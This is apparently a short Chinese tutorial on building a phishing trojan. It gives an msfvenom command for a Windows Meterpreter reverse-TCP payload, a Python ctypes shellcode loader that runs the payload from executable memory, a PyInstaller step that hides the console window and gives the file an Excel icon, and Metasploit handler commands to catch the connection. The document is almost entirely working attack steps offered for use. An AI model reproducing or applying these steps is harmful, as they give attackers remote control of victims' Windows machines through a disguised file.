生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.98 LPORT=2333 -f py
import ctypes
import sys
from ctypes import *

# Shellcode loader: allocate writable+executable memory, copy the embedded
# payload into it, and run it on a new thread. This is the well-known
# VirtualAlloc(RWX) -> RtlMoveMemory -> CreateThread sequence that endpoint
# monitoring commonly flags (RWX allocation followed by a thread started in
# heap memory). The payload bytes are elided on this page ("....").
# 192.168.151.171 2333
buf = b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
....

PAGE_EXECUTE_READWRITE = 0x00000040 # page protection: readable, writable AND executable
VIRTUAL_MEM = (0x1000 | 0x2000) # allocation type flags (MEM_COMMIT | MEM_RESERVE)
buf_arr = bytearray(buf) # mutable copy of the shellcode so ctypes can alias it as a C buffer
buf_size = len(buf_arr) # payload length in bytes
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") # load kernel32.dll to reach the Win32 memory/thread APIs
kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 64-bit return type so the returned address is not truncated on x64
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) # reserve+commit an RWX region of buf_size bytes at an OS-chosen address (NULL)
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) # C char array that shares buf_arr's memory (no copy)
# print(sc_ptm)
# #print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr), buf_ptr, ctypes.c_int(buf_size)) # copy the payload bytes into the RWX region

# Start a thread whose entry point is the RWX region, then block on it with
# an INFINITE (-1) timeout so the process stays alive while the payload runs.
handle = kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(sc_ptr), ctypes.c_int(0),
ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

打包

pyinstaller -F fish.py --icon="xlsx.ico" -w

-w 程序运行不显示窗口

--icon是图标

msf开启监听

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.122
set lport 2333
run